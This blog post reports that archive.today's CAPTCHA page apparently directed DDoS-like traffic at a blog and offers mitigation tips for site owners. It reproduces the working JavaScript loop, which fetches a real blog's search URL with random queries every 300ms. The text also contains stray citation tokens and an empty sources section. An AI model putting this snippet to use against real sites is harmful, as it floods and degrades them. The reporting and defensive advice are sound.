A Blog Under Siege: archive.today Reportedly Directing a DDoS Attack

Incident & analysis

A Blog Under Siege: archive.today Reportedly Directing a DDoS Attack

February 2026 · report & mitigation · tags: archive.today, DDoS, web-archives

Summary: Multiple reports show that archive.today’s CAPTCHA page executed client-side JavaScript which repeatedly requested a blog’s search endpoint, creating DDoS-like traffic while the CAPTCHA page stayed open. The original writeup includes code samples and screenshots used to validate the behavior. :contentReference[oaicite:2]{index=2}

What was observed

Observers found a short `setInterval` loop on the archive.today CAPTCHA page that issued `fetch()` requests to a target blog’s search URL every ~300ms with randomized query strings — ensuring the requests bypass cache and impose continuous load while the page remained open. The code sample published in the report demonstrates this pattern. :contentReference[oaicite:3]{index=3}

setInterval(function() {
  fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer",
    mode: "no-cors"
  });
}, 300);

The incident and the code sample were discussed by community members on Hacker News and Reddit, where users verified, debated, and suggested mitigations. :contentReference[oaicite:4]{index=4}

Timeline & reaction

  • Initial observation and public write-up by the blog owner (Gyrovague) documenting the code and timeline. :contentReference[oaicite:5]{index=5}
  • Community threads on Hacker News and Reddit discussing verification, impact, and blocking approaches. :contentReference[oaicite:6]{index=6}
  • Some blocklists and adblock rules were updated to prevent these requests for users with blockers enabled (reported in the original post).

Quick mitigation checklist (for site owners)

  • Implement rate limiting on search endpoints (return 429 after threshold) and consider short caching of generic unknown queries.
  • Use a Web Application Firewall (WAF) or CDN rules to detect repeated requests with random query-strings and mitigate/block them.
  • Log and capture sample request headers/time windows to support abuse reports or help blocklists.
  • Consider adding simple defenses that ignore obviously-random lookups (e.g., treat queries shorter than X characters or purely-random tokens as low-cost responses).
  • Notify your host/registry and collect evidence if you suspect an external service is generating abusive traffic.

Sources & further reading

Short share blurb: Reports say archive.today's CAPTCHA page repeatedly requested a blog's search endpoint, producing DDoS-like traffic. Summary + mitigation tips.

Publisher note: This post summarizes primary reporting and community discussion. Use the source links above to view original screenshots, email timelines, and full code samples. :contentReference[oaicite:7]{index=7}

Comments